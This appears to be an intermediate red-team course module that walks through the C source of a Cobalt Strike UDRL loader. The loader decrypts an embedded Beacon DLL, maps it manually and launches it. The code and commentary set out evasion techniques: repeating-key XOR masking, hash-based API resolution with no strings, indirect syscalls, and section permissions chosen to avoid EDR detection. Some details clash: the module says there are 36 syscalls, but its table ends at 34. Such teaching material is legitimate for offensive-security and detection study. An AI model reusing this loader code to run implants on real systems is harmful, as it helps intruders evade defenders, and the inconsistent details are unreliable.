Difficulty: Intermediate

Module 5: The UDRL Loader Walkthrough

A line-by-line analysis of Crystal-Loaders' udrl/src/loader.c — the single C source file that decrypts, loads, and launches Beacon.

Module Objective

This is the core module of the course. We walk through every step of the actual loader.c source code: from extracting encrypted resources, through PE loading with LibTCG primitives, to the three-call Beacon initialization protocol. By the end you will understand exactly how a Crystal-Loaders UDRL turns a raw encrypted blob into a running Cobalt Strike Beacon.

1. File Overview

The loader is a single C source file compiled with MinGW into position-independent code. It has no standard C runtime — every external function is resolved at runtime through Crystal Palace's DFR (Dynamic Function Resolution) mechanism.

Include Headers

The file includes four headers, each providing a distinct capability layer:

C - loader.c includes
#include <windows.h>
#include "beacon.h"    // BUD structures from Cobalt Strike
#include "gate.h"      // LibGate indirect syscalls
#include "tcg.h"       // LibTCG PE loading primitives

Header Responsibilities

Header | Provides
windows.h | Standard Windows type definitions (LPVOID, DWORD, BOOL, etc.)
beacon.h | Cobalt Strike BUD structures: USER_DATA, SYSCALL_API, RTL_API, ALLOCATED_MEMORY
gate.h | LibGate indirect syscall stubs and resolution functions
tcg.h | LibTCG PE primitives: ParseDLL, LoadDLL, ProcessImports, EntryPoint (note: FixSectionPermissions is defined locally in loader.c, not in tcg.h)

BOF-Style DLL Imports

Instead of normal import table entries (which would require an IAT and break position independence), the loader declares every external function using DECLSPEC_IMPORT with the LIBRARY$Function naming convention. Crystal Palace's DFR rewrites these at link time into hash-based runtime resolution calls.

C - BOF-style imports
DECLSPEC_IMPORT LPVOID  WINAPI KERNEL32$VirtualAlloc(LPVOID, SIZE_T, DWORD, DWORD);
DECLSPEC_IMPORT BOOL    WINAPI KERNEL32$VirtualProtect(LPVOID, SIZE_T, DWORD, PDWORD);
DECLSPEC_IMPORT BOOL    WINAPI KERNEL32$VirtualFree(LPVOID, SIZE_T, DWORD);
DECLSPEC_IMPORT int            MSVCRT$strncmp(const char *, const char *, size_t);

Why BOF-Style?

This naming convention originates from Cobalt Strike's Beacon Object Files (BOFs). The LIBRARY$Function pattern tells the Crystal Palace linker to replace each call site with an invocation of resolve(LIBRARY_HASH, Function_HASH). The result: the compiled PIC blob has zero IAT entries and resolves every API call at runtime through PEB walking and EAT parsing.
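To make the naming convention concrete, here is a minimal sketch of how a build tool could split a LIBRARY$Function symbol into its two halves before hashing each one. The helper name split_dfr_symbol and its buffer-based interface are hypothetical, chosen for illustration; this is not Crystal Palace's code.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: split "LIBRARY$Function" at the first '$'.
 * Returns 1 on success, 0 if the symbol does not follow the convention
 * or one of the parts does not fit in the caller's buffers. */
int split_dfr_symbol(const char *symbol,
                     char *library, size_t library_cap,
                     char *function, size_t function_cap)
{
    assert(symbol != NULL && library != NULL && function != NULL);

    const char *dollar = strchr(symbol, '$');
    if (dollar == NULL)
        return 0;

    size_t lib_len  = (size_t)(dollar - symbol);
    size_t func_len = strlen(dollar + 1);
    if (lib_len == 0 || func_len == 0)
        return 0;
    if (lib_len >= library_cap || func_len >= function_cap)
        return 0;

    memcpy(library, symbol, lib_len);
    library[lib_len] = '\0';
    memcpy(function, dollar + 1, func_len + 1);  /* copies the terminator too */
    return 1;
}
```

Given "KERNEL32$VirtualAlloc", the helper yields "KERNEL32" and "VirtualAlloc"; a symbol without a '$' is rejected.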

Key Defines

C - defines
#define NTDLL_HASH    0x3CFA685D           // ROR13 hash of "ntdll.dll"
#define memset(x,y,z) __stosb((PBYTE)(x),(BYTE)(y),(SIZE_T)(z))
#define GETRESOURCE(x) (char *)&x

Define Breakdown

Define | Purpose
NTDLL_HASH | Pre-computed ROR13 hash of the string "ntdll.dll", used by ResolveSyscalls to find ntdll without string comparison
memset | Macro replacing standard memset with the compiler intrinsic __stosb, which avoids linking to the C runtime
GETRESOURCE | Casts a zero-length array (section marker) to a char *, giving access to the length-prefixed data that Crystal Palace linked into that section

2. Embedded Resources

Crystal Palace links the encrypted Beacon DLL and XOR key into named PE sections at build time. The loader accesses them through zero-length array markers — a technique that produces no data in the object file but provides a symbol pointing to the start of the section.

C - section markers
// Zero-length arrays in custom sections; Crystal Palace fills these at link time
char _DLL_[0] __attribute__((section("dll")));
char _KEY_[0] __attribute__((section("key")));

The RESOURCE Structure

Every embedded resource is stored as a length-prefixed byte array. The first field is an int length, followed by a char value[] flexible array member. This structure lets the loader know exactly how many bytes to process without relying on sentinel values or section headers.

C - RESOURCE typedef
typedef struct {
    int  length;
    char value[];
} RESOURCE;
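The length-prefixed layout can be exercised outside the loader. The sketch below reads such a blob from an ordinary byte buffer; resource_view and read_resource are hypothetical names, and the bounds check is an addition for safety that the loader excerpt itself does not perform.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Mirrors the layout described above: a 4-byte length, then the payload. */
typedef struct {
    int32_t        length;
    const uint8_t *value;   /* points into the original blob, no copy */
} resource_view;

/* Read a length-prefixed blob. memcpy avoids unaligned access; the length
 * is interpreted in host byte order (little-endian on x86/x64).
 * Returns 1 on success, 0 if the prefix is missing or claims more bytes
 * than the blob actually holds. */
int read_resource(const uint8_t *blob, size_t blob_size, resource_view *out)
{
    assert(blob != NULL && out != NULL);

    int32_t length;
    if (blob_size < sizeof length)
        return 0;
    memcpy(&length, blob, sizeof length);
    if (length < 0 || (size_t)length > blob_size - sizeof length)
        return 0;

    out->length = length;
    out->value  = blob + sizeof length;
    return 1;
}
```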

Crystal Palace Link Pipeline

Beacon DLL (raw bytes) -> XOR Encrypt (128-bit key) -> Prepend Length (4-byte DWORD) -> Link into "dll" section

When Crystal Palace's spec file processes push $DLL / xor $KEY / preplen / link "dll", the pipeline executes these four steps:

Spec Pipeline Steps

Step | Spec Command | Action
1 | push $DLL | Push the raw Beacon DLL bytes onto the spec stack
2 | xor $KEY | XOR the top-of-stack with a generated 128-bit key
3 | preplen | Prepend a 4-byte length field (creating the RESOURCE structure)
4 | link "dll" | Link the result into the "dll" section of the final PIC blob
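The middle two steps of the pipeline can be modeled in a few lines of C. This is a sketch of the data transformation only, under the assumption that the length is stored in host byte order; mask_and_prefix is a hypothetical name and the code does not reflect how Crystal Palace is implemented.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Model of "xor $KEY" followed by "preplen": returns a malloc'd buffer
 * holding a 4-byte length and the masked payload, or NULL on allocation
 * failure. The caller frees the result. */
uint8_t *mask_and_prefix(const uint8_t *payload, int32_t payload_len,
                         const uint8_t *key, size_t key_len,
                         size_t *out_size)
{
    assert(payload != NULL && key != NULL && out_size != NULL);
    assert(payload_len >= 0 && key_len > 0);

    size_t header = sizeof payload_len;
    size_t total  = header + (size_t)payload_len;
    uint8_t *blob = malloc(total);
    if (blob == NULL)
        return NULL;

    /* Length prefix first in memory, masked bytes after it. */
    memcpy(blob, &payload_len, header);
    for (size_t i = 0; i < (size_t)payload_len; i++)
        blob[header + i] = (uint8_t)(payload[i] ^ key[i % key_len]);

    *out_size = total;
    return blob;
}
```

The resulting buffer has the same shape the loader later reads through the RESOURCE structure: length first, masked bytes after.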

3. The go() Entry Point — Full Walkthrough

The go() function is the loader's entry point — the first code that executes when the PIC blob runs. It orchestrates the entire loading sequence in nine discrete steps. Each step has a single responsibility and builds on the previous one.

go() Execution Pipeline

Get Resources (Step 1) -> XOR Unmask (Step 2) -> Parse PE (Step 3) -> Load DLL (Step 4) -> Init BUD (Step 5) -> Fix Perms (Step 6-7) -> Resolve APIs (Step 8) -> Call Beacon (Step 9)

Step 1 — Get Embedded Resources

The loader retrieves pointers to the encrypted Beacon DLL and the XOR key from their respective PE sections using the GETRESOURCE macro.

C - Step 1
RESOURCE * dll = (RESOURCE *)GETRESOURCE(_DLL_);
RESOURCE * key = (RESOURCE *)GETRESOURCE(_KEY_);

What GETRESOURCE Returns

GETRESOURCE(_DLL_) expands to (char *)&_DLL_. Since _DLL_ is a zero-length array at the start of the "dll" section, its address points directly to the RESOURCE structure that Crystal Palace linked there. The caller then casts the result to RESOURCE *. The dll->length field gives the encrypted payload size, and dll->value points to the encrypted bytes.

Step 2 — Allocate + XOR Unmask

A fresh RW buffer is allocated for the decrypted Beacon DLL. Each byte of the encrypted payload is XOR'd with the corresponding byte of the rotating key.

C - Step 2
// Allocate RW buffer for the decrypted Beacon DLL
PBYTE src = KERNEL32$VirtualAlloc(NULL, dll->length,
    MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

// XOR-unmask: each byte of payload XOR'd with rotating key
for (DWORD i = 0; i < dll->length; i++)
    src[i] = dll->value[i] ^ key->value[i % key->length];

Key Rotation

The expression i % key->length implements key rotation: the 128-bit (16-byte) key repeats every 16 bytes of the payload. This is a simple repeating-key XOR cipher. It is not cryptographically strong, but it keeps the Beacon DLL's plaintext bytes out of the PIC blob, which is enough to defeat static signatures written against the unmasked DLL.
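The rotation is easy to verify in isolation. Below is a minimal, portable sketch of the same loop; xor_rotating is a hypothetical name, and the key_len check is an addition that guards the modulo against a zero-length key.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* XOR len bytes of src with a repeating key and write them to dst.
 * dst may equal src for in-place operation. Because XOR is its own
 * inverse, the same call both masks and unmasks. */
void xor_rotating(uint8_t *dst, const uint8_t *src, size_t len,
                  const uint8_t *key, size_t key_len)
{
    assert(dst != NULL && src != NULL && key != NULL);
    assert(key_len > 0);            /* guards the modulo below */

    for (size_t i = 0; i < len; i++)
        dst[i] = (uint8_t)(src[i] ^ key[i % key_len]);
}
```

With a 16-byte key, payload byte 16 is combined with key byte 0 again, and running the function a second time over the output restores the input.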

Step 3 — Parse PE

LibTCG's ParseDLL reads the PE headers from the decrypted buffer and populates a DLLDATA structure with section info, import table pointers, relocation data, and entry point offset.

C - Step 3
DLLDATA data;
memset(&data, 0, sizeof(DLLDATA));
ParseDLL(src, &data);

DLLDATA Contents

After ParseDLL, the data structure contains everything needed to manually load the DLL: the IMAGE_NT_HEADERS pointer, the section table, import directory RVA, relocation directory RVA, and the AddressOfEntryPoint. The original buffer (src) is still needed as the source of section data.
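To show where a few of these fields live in the file, here is a minimal sketch that reads them straight from a byte buffer using the fixed offsets of the PE format. The pe_summary type and parse_pe_headers function are hypothetical and far smaller than LibTCG's DLLDATA and ParseDLL, whose real layout is not reproduced here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical summary type, not LibTCG's DLLDATA. */
typedef struct {
    uint32_t nt_offset;          /* e_lfanew: file offset of "PE\0\0" */
    uint16_t number_of_sections;
    uint32_t entry_point_rva;    /* AddressOfEntryPoint */
    uint32_t size_of_image;      /* SizeOfImage */
} pe_summary;

/* Little-endian readers that do not depend on host alignment. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 1 and fills out if image starts with plausible PE headers. */
int parse_pe_headers(const uint8_t *image, size_t size, pe_summary *out)
{
    assert(image != NULL && out != NULL);

    if (size < 0x40 || rd16(image) != 0x5A4D)        /* "MZ" */
        return 0;
    uint32_t nt = rd32(image + 0x3C);                /* e_lfanew */
    /* Signature (4) + file header (20) + optional header through SizeOfImage (60) */
    if (nt > size || size - nt < 4 + 20 + 60)
        return 0;
    if (memcmp(image + nt, "PE\0\0", 4) != 0)
        return 0;

    const uint8_t *file_hdr = image + nt + 4;
    const uint8_t *opt_hdr  = file_hdr + 20;
    out->nt_offset          = nt;
    out->number_of_sections = rd16(file_hdr + 2);
    out->entry_point_rva    = rd32(opt_hdr + 16);    /* same offset in PE32 and PE32+ */
    out->size_of_image      = rd32(opt_hdr + 56);    /* same offset in PE32 and PE32+ */
    return 1;
}
```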

Step 4 — Allocate + Load DLL

A second allocation provides the final memory region where the Beacon DLL will live. LoadDLL copies sections to their correct virtual offsets, and ProcessImports resolves the Beacon DLL's own import table.

C - Step 4
DWORD size = SizeOfDLL(&data);
PBYTE dst = KERNEL32$VirtualAlloc(NULL, size,
    MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

LoadDLL(&data, src, dst);

// Initialize import resolution functions
IMPORTFUNCS funcs;
funcs.loadLibraryA = KERNEL32$LoadLibraryA;
funcs.getProcAddress = KERNEL32$GetProcAddress;
ProcessImports(&funcs, &data, dst);

LibTCG Loading Primitives

Function | Responsibility
SizeOfDLL | Returns SizeOfImage from the PE optional header, the total virtual size needed
LoadDLL | Takes three arguments: DLLDATA, source buffer (src), and destination (dst). Copies each PE section from src to the correct offset in dst, applies base relocations
ProcessImports | Takes three arguments: an IMPORTFUNCS struct (holding LoadLibraryA and GetProcAddress pointers), DLLDATA, and destination. Walks the import descriptor table, resolves each imported function, patches the IAT
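The section-copy half of what LoadDLL is described as doing can be sketched on plain buffers. The section_info record and copy_sections function are hypothetical simplifications: a real IMAGE_SECTION_HEADER has more fields, and this sketch does not apply relocations.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical, trimmed-down section record. */
typedef struct {
    uint32_t virtual_address;   /* RVA of the section in the loaded image */
    uint32_t raw_offset;        /* PointerToRawData in the file */
    uint32_t raw_size;          /* SizeOfRawData in the file */
} section_info;

/* Copy each section from its file offset in src to its RVA in dst.
 * Returns 1 on success, 0 if any section falls outside either buffer. */
int copy_sections(uint8_t *dst, size_t dst_size,
                  const uint8_t *src, size_t src_size,
                  const section_info *sections, size_t count)
{
    assert(dst != NULL && src != NULL && sections != NULL);

    for (size_t i = 0; i < count; i++) {
        const section_info *s = &sections[i];
        if (s->raw_offset > src_size || s->raw_size > src_size - s->raw_offset)
            return 0;
        if (s->virtual_address > dst_size ||
            s->raw_size > dst_size - s->virtual_address)
            return 0;
        memcpy(dst + s->virtual_address, src + s->raw_offset, s->raw_size);
    }
    return 1;
}
```

The key point is that file offsets and virtual offsets differ, which is why the loader needs both the src buffer and a separately sized dst region.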

Step 5 — Initialize BUD (Beacon User Data)

The BUD (Beacon User Data) is a set of structures that the loader passes to Beacon. It provides Beacon with pre-resolved syscall stubs, RTL function pointers, and memory region metadata for sleep masking.

C - Step 5
USER_DATA bud;
memset(&bud, 0, sizeof(USER_DATA));
bud.version = COBALT_STRIKE_VERSION;  // 0x041100 = CS 4.11

SYSCALL_API syscalls;
memset(&syscalls, 0, sizeof(SYSCALL_API));
bud.syscalls = &syscalls;

RTL_API rtlFunctions;
memset(&rtlFunctions, 0, sizeof(RTL_API));
bud.rtls = &rtlFunctions;

ALLOCATED_MEMORY memory;
memset(&memory, 0, sizeof(ALLOCATED_MEMORY));
bud.allocatedMemory = &memory;

BUD Sub-Structures

Structure | Field | Purpose
USER_DATA | version | Cobalt Strike version identifier; Beacon uses this for compatibility checks
SYSCALL_API | bud.syscalls | Contains function pointers for 36 Nt* syscall stubs that Beacon calls instead of using ntdll directly
RTL_API | bud.rtls | Contains pointers to Rtl* utility functions (rtlDosPathNameToNtPathNameUWithStatus, rtlFreeHeap, and rtlGetProcessHeap)
ALLOCATED_MEMORY | bud.allocatedMemory | Tracks memory regions so Beacon's sleep mask can encrypt/decrypt them during sleep cycles

Step 6 — Fix Section Permissions + Track Memory

After loading, all sections are RW. FixSectionPermissions iterates through each PE section and calls VirtualProtect with the correct permission flags. It also populates the ALLOCATED_MEMORY_REGION metadata so Beacon knows the layout of its own memory.

C - Step 6
FixSectionPermissions(&data, dst, &memory.AllocatedMemoryRegions[0]);

Section Permission Mapping

Section | Permission | Windows Constant
.text | Execute + Read | PAGE_EXECUTE_READ
.rdata | Read Only | PAGE_READONLY
.data | Read + Write | PAGE_READWRITE
.pdata | Read Only | PAGE_READONLY
.reloc | Read Only | PAGE_READONLY
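A loader usually derives these protections from each section's Characteristics flags rather than from its name. The sketch below shows one common way to do that mapping; it is an assumption about the approach, not the actual body of FixSectionPermissions. The numeric values match the Windows SDK definitions but are given local names so the code compiles without windows.h.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* IMAGE_SCN_MEM_* flags from the PE format. */
#define SCN_MEM_EXECUTE 0x20000000u
#define SCN_MEM_READ    0x40000000u
#define SCN_MEM_WRITE   0x80000000u

/* PAGE_* protection constants. */
#define PG_NOACCESS          0x01u
#define PG_READONLY          0x02u
#define PG_READWRITE         0x04u
#define PG_EXECUTE           0x10u
#define PG_EXECUTE_READ      0x20u
#define PG_EXECUTE_READWRITE 0x40u

/* Map one section's characteristics to a page protection value. */
uint32_t protection_for(uint32_t characteristics)
{
    int x = (characteristics & SCN_MEM_EXECUTE) != 0;
    int r = (characteristics & SCN_MEM_READ)    != 0;
    int w = (characteristics & SCN_MEM_WRITE)   != 0;

    if (x && w) return PG_EXECUTE_READWRITE;
    if (x && r) return PG_EXECUTE_READ;
    if (x)      return PG_EXECUTE;
    if (w)      return PG_READWRITE;
    if (r)      return PG_READONLY;
    return PG_NOACCESS;
}

/* Map a whole section table; the caller would then pass each result
 * to VirtualProtect for the matching address range. */
void map_section_protections(const uint32_t *characteristics,
                             uint32_t *protections, size_t count)
{
    assert(characteristics != NULL && protections != NULL);
    for (size_t i = 0; i < count; i++)
        protections[i] = protection_for(characteristics[i]);
}
```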

Why Permissions Matter

Allocating the whole image as RWX would work functionally but is a glaring detection indicator: EDR products flag RWX memory regions as suspicious. Applying the correct per-section permissions gives the loaded Beacon DLL the same protection layout that a memory scanner expects from a normally loaded DLL.

Step 7 — Set Cleanup Info

The loader tells Beacon how the memory was allocated and whether Beacon should clean it up. This metadata is critical for Beacon's sleep masking — it needs to know the allocation method to correctly free or re-protect memory during sleep.

C - Step 7
memory.AllocatedMemoryRegions[0].CleanupInformation.AllocationMethod = METHOD_VIRTUALALLOC;
memory.AllocatedMemoryRegions[0].CleanupInformation.Cleanup = TRUE;
memory.AllocatedMemoryRegions[0].Purpose = PURPOSE_BEACON_MEMORY;

Cleanup Fields

Field | Value | Meaning
AllocationMethod | METHOD_VIRTUALALLOC | Memory was allocated with VirtualAlloc (as opposed to NtMapViewOfSection or HeapAlloc)
Cleanup | TRUE | Beacon should free this region when shutting down
Purpose | PURPOSE_BEACON_MEMORY | This region contains the Beacon DLL itself (not shellcode or other data)

Step 8 — Resolve Syscalls + RTL Functions

Two resolution functions populate the BUD sub-structures with live function pointers. These pointers allow Beacon to execute syscalls indirectly (through LibGate stubs) and call Rtl* utilities without importing them.

C - Step 8
ResolveSyscalls(&syscalls);
ResolveRtlFunctions(&rtlFunctions);

Why Resolve at Load Time?

By resolving all 36 Nt* functions and the Rtl* utilities during loading, the loader spares Beacon from looking them up during operation. Beacon reaches these functions through the pre-resolved pointers in the BUD, so EDR products that hook GetProcAddress and LdrGetProcedureAddress see no lookups for them while Beacon runs. Beacon's ordinary imports are a separate matter: ProcessImports already resolved those in Step 4 through LoadLibraryA and GetProcAddress.

Step 9 — Get Entry Point, Clean Up, Call Beacon

The final step resolves the Beacon DLL's entry point, frees the decrypted buffer (no longer needed), and makes the three DllMain calls that constitute the Cobalt Strike initialization protocol.

C - Step 9
DLLMAIN_FUNC entryPoint = (DLLMAIN_FUNC)EntryPoint(&data, dst);

// Free the decrypted buffer (no longer needed)
KERNEL32$VirtualFree(src, 0, MEM_RELEASE);

// Three DllMain calls — this is the Cobalt Strike protocol:
entryPoint((HINSTANCE)0, DLL_BEACON_USER_DATA, &bud);            // Pass BUD to Beacon
entryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, NULL);             // Standard DLL init
entryPoint((HINSTANCE)GETRESOURCE(go), DLL_BEACON_START, NULL);   // Start Beacon

Buffer Cleanup Timing

The decrypted buffer (src) is freed before calling Beacon's entry point. This is intentional: the buffer contains a fully decrypted copy of the Beacon DLL, which would be trivially detectable by a memory scanner. By freeing it before Beacon starts operating, the loader minimizes the window during which a cleartext DLL exists in memory. The loaded copy at dst has proper section permissions and looks like a normally loaded module.

4. The Three DllMain Calls

Unlike a normal DLL that receives a single DLL_PROCESS_ATTACH call, Cobalt Strike Beacon requires three separate DllMain invocations. Each call uses a different fdwReason value and passes different data through the parameters.

Three-Call Initialization Protocol

Call 1: DLL_BEACON_USER_DATA (reason = 0x0d) -> Call 2: DLL_PROCESS_ATTACH (reason = 0x01) -> Call 3: DLL_BEACON_START (reason = 0x04)

Call-by-Call Breakdown

Call | fdwReason | hinstDLL | lpReserved | Purpose
1 | DLL_BEACON_USER_DATA (0x0d) | 0 (unused) | &bud | Passes the USER_DATA pointer to Beacon. Beacon stores references to SYSCALL_API, RTL_API, and ALLOCATED_MEMORY for later use.
2 | DLL_PROCESS_ATTACH (0x01) | dst (base address) | NULL | Standard DLL initialization. Beacon sets up internal state, communication channels, and thread-local storage.
3 | DLL_BEACON_START (0x04) | go (loader addr) | NULL | Signals Beacon to begin execution. The go function pointer is passed so Beacon can free the loader's memory region.

Call 1: DLL_BEACON_USER_DATA (0x0d)

This custom reason code (not a standard Windows constant) tells Beacon's DllMain that the lpReserved parameter contains a USER_DATA*. Beacon casts it and stores the three sub-structure pointers (syscalls, rtls, and allocatedMemory) internally. These pointers are used throughout Beacon's lifetime.

Call 2: DLL_PROCESS_ATTACH (0x01)

This is the standard Windows DLL initialization call. Beacon uses this to perform one-time setup: initialize its configuration parser, set up named pipes or HTTP channels, configure sleep timers, and register exception handlers. The hinstDLL parameter receives the base address (dst) so Beacon knows where it is loaded in memory.

Call 3: DLL_BEACON_START (0x04)

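The final call uses the custom reason code DLL_BEACON_START (0x04) as a start signal. Like DLL_BEACON_USER_DATA, this value is not one of the four standard Windows reason codes, which run from 0 (DLL_PROCESS_DETACH) to 3 (DLL_THREAD_DETACH); DLL_THREAD_ATTACH is 2, not 4. The hinstDLL parameter receives the go function pointer, the address of the loader itself. Beacon stores this address so it can later call VirtualFree on the loader's memory region, erasing the UDRL code from memory after initialization is complete.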

Order Matters

The three calls must happen in this exact order. Call 1 must precede Call 2 because Beacon's DLL_PROCESS_ATTACH handler may use the syscall stubs that were passed in Call 1. Call 3 must be last because it starts the Beacon main loop, which never returns — any code after Call 3 will not execute.
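The ordering constraint can be modeled as a small state machine. The sketch below is a stand-in for the payload side, written only to illustrate the protocol: mock_entry and mock_payload are hypothetical, and the strict rejection of out-of-order calls is an assumption, since Beacon's actual DllMain is not shown in this module.

```c
#include <assert.h>
#include <stddef.h>

#define REASON_PROCESS_ATTACH   0x01u   /* DLL_PROCESS_ATTACH */
#define REASON_BEACON_START     0x04u   /* DLL_BEACON_START */
#define REASON_BEACON_USER_DATA 0x0du   /* DLL_BEACON_USER_DATA */

typedef enum { ST_NEW, ST_HAS_BUD, ST_ATTACHED, ST_STARTED } init_state;

typedef struct {
    init_state  state;
    const void *user_data;    /* stored by call 1 */
    const void *image_base;   /* stored by call 2 */
    const void *loader_addr;  /* stored by call 3 */
} mock_payload;

/* Hypothetical stand-in for the payload's DllMain. Returns 1 if the call
 * arrived in the expected order, 0 otherwise. */
int mock_entry(mock_payload *p, const void *hinst,
               unsigned reason, const void *reserved)
{
    assert(p != NULL);

    switch (reason) {
    case REASON_BEACON_USER_DATA:
        if (p->state != ST_NEW || reserved == NULL) return 0;
        p->user_data = reserved;
        p->state = ST_HAS_BUD;
        return 1;
    case REASON_PROCESS_ATTACH:
        if (p->state != ST_HAS_BUD) return 0;
        p->image_base = hinst;
        p->state = ST_ATTACHED;
        return 1;
    case REASON_BEACON_START:
        if (p->state != ST_ATTACHED) return 0;
        p->loader_addr = hinst;
        p->state = ST_STARTED;
        return 1;
    default:
        return 0;
    }
}
```

Calling the mock with the three reasons in the documented order advances it to ST_STARTED; sending DLL_PROCESS_ATTACH first is rejected because no user data has been stored yet.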

5. The resolve() Function

The resolve() function is the bridge between BOF-style import declarations and runtime API resolution. Crystal Palace's DFR mechanism rewrites every KERNEL32$VirtualAlloc call into a resolve(KERNEL32_HASH, VirtualAlloc_HASH) call at link time.

C - resolve()
char * resolve(DWORD modHash, DWORD funcHash)
{
    PVOID mod = findModuleByHash(modHash);
    return findFunctionByHash(mod, funcHash);
}

DFR Resolution Flow

Source Code: KERNEL32$VirtualAlloc(...) -> DFR Rewrite: resolve(K32_HASH, VA_HASH) -> PEB Walk: findModuleByHash -> EAT Walk: findFunctionByHash

Resolution Internals

Function | Mechanism | Returns
findModuleByHash | Walks the PEB's InLoadOrderModuleList, computes ROR13 hash of each DLL name, compares against modHash | Base address of the target DLL
findFunctionByHash | Parses the DLL's Export Address Table (EAT), computes ROR13 hash of each export name, compares against funcHash | Address of the target function
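The lookup-by-hash idea can be demonstrated without a real PE image. In the sketch below a small array of name and address pairs stands in for the export table; mock_export, hash_name, and find_export_by_hash are hypothetical names, and the ASCII ROR13 variant used here is an assumption rather than LibTCG's exact hashing.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stand-in for one export: a name and the address it resolves to. */
typedef struct {
    const char *name;
    void       *address;
} mock_export;

/* ROR13 over an ASCII name (assumed variant). */
static uint32_t hash_name(const char *s)
{
    uint32_t h = 0;
    for (; *s; s++) {
        h = (h >> 13) | (h << 19);     /* rotate right by 13 */
        h += (unsigned char)*s;
    }
    return h;
}

/* Hash every export name and return the address of the first match,
 * or NULL if no name hashes to the wanted value. */
void *find_export_by_hash(const mock_export *exports, size_t count,
                          uint32_t wanted)
{
    assert(exports != NULL);
    for (size_t i = 0; i < count; i++)
        if (hash_name(exports[i].name) == wanted)
            return exports[i].address;
    return NULL;
}
```

The caller never passes a string, only the 32-bit value, which is why the names do not need to appear in the calling code.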

No Strings in the Binary

Because every module and function name is converted to a ROR13 hash at build time (by the DFR rewrite at link time, or as a pre-computed constant such as NTDLL_HASH), the final PIC blob contains no API name strings. Static analysis tools that search for strings like "VirtualAlloc" or "NtAllocateVirtualMemory" will find nothing. The only way to determine what APIs the loader calls is to reverse-engineer the hash values or analyze the code dynamically.

6. ResolveSyscalls() — All 36 Nt* Functions

ResolveSyscalls populates the SYSCALL_API structure with resolved entries for every Nt* function that Beacon supports. Each entry contains both the function address and the syscall number (SSN), enabling LibGate's indirect syscall mechanism.

C - ResolveSyscalls()
void ResolveSyscalls(SYSCALL_API * syscalls)
{
    PVOID ntdll = findModuleByHash(NTDLL_HASH);

    ResolveSyscallEntry(ntdll,
        findFunctionByHash(ntdll, NtAllocateVirtualMemory_HASH),
        &syscalls->ntAllocateVirtualMemory);
    ResolveSyscallEntry(ntdll,
        findFunctionByHash(ntdll, NtProtectVirtualMemory_HASH),
        &syscalls->ntProtectVirtualMemory);
    // ... 33 more Nt* functions
    ResolveSyscallEntry(ntdll,
        findFunctionByHash(ntdll, NtWaitForMultipleObjects_HASH),
        &syscalls->ntWaitForMultipleObjects);
}

ResolveSyscallEntry Internals

Each call to ResolveSyscallEntry does three things:

  1. Stores the function address in the SYSCALL_API_ENTRY
  2. Reads the SSN (System Service Number) from the mov eax, SSN instruction near the start of the ntdll stub (on x64 it follows mov r10, rcx)
  3. Locates the syscall instruction within the stub for indirect syscall execution
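Steps 2 and 3 can be sketched against a byte array that holds a copy of an unhooked x64 stub. This is a simplified illustration, not LibGate's implementation: parse_syscall_stub and stub_info are hypothetical names, the code assumes the stub has not been patched by a hook, and the plain byte scan for 0F 05 could in principle match inside another instruction's operand.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct {
    uint32_t ssn;             /* system service number */
    size_t   syscall_offset;  /* offset of the 0F 05 bytes within the stub */
} stub_info;

/* Parse an unhooked x64 stub of the form:
 *   4C 8B D1          mov r10, rcx
 *   B8 imm32          mov eax, SSN
 *   ...               (other instructions may follow)
 *   0F 05             syscall
 * Returns 1 on success, 0 if the expected pattern is not found. */
int parse_syscall_stub(const uint8_t *stub, size_t size, stub_info *out)
{
    assert(stub != NULL && out != NULL);

    if (size < 8)
        return 0;
    if (stub[0] != 0x4C || stub[1] != 0x8B || stub[2] != 0xD1 || stub[3] != 0xB8)
        return 0;

    /* The SSN is the little-endian imm32 operand of mov eax. */
    out->ssn = (uint32_t)stub[4] | ((uint32_t)stub[5] << 8) |
               ((uint32_t)stub[6] << 16) | ((uint32_t)stub[7] << 24);

    for (size_t i = 8; i + 1 < size; i++) {
        if (stub[i] == 0x0F && stub[i + 1] == 0x05) {
            out->syscall_offset = i;
            return 1;
        }
    }
    return 0;
}
```

A stub that begins with a jump (for example E9, as inline hooks often do) fails the prologue check, which is the case a production resolver would need extra logic to handle.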

Complete SYSCALL_API — All 36 Nt* Functions

The following table lists every Nt* function in the Beacon SYSCALL_API structure (field names use lowercase nt prefix). These cover all system-level operations that Beacon performs: memory management, process/thread manipulation, file I/O, and object management.

# | Field Name | Category
1 | ntAllocateVirtualMemory | Memory
2 | ntProtectVirtualMemory | Memory
3 | ntFreeVirtualMemory | Memory
4 | ntGetContextThread | Thread
5 | ntSetContextThread | Thread
6 | ntResumeThread | Thread
7 | ntCreateThreadEx | Thread
8 | ntOpenProcess | Process
9 | ntOpenThread | Thread
10 | ntClose | Object
11 | ntCreateSection | Memory
12 | ntMapViewOfSection | Memory
13 | ntUnmapViewOfSection | Memory
14 | ntQueryVirtualMemory | Memory
15 | ntDuplicateObject | Object
16 | ntReadVirtualMemory | Memory
17 | ntWriteVirtualMemory | Memory
18 | ntReadFile | File I/O
19 | ntWriteFile | File I/O
20 | ntCreateFile | File I/O
21 | ntQueueApcThread | Thread
22 | ntCreateProcess | Process
23 | ntOpenProcessToken | Token
24 | ntTestAlert | Thread
25 | ntSuspendProcess | Process
26 | ntResumeProcess | Process
27 | ntQuerySystemInformation | System
28 | ntQueryDirectoryFile | File I/O
29 | ntSetInformationProcess | Process
30 | ntSetInformationThread | Thread
31 | ntQueryInformationProcess | Process
32 | ntQueryInformationThread | Thread
33 | ntOpenSection | Memory
34 | ntAdjustPrivilegesToken | Token
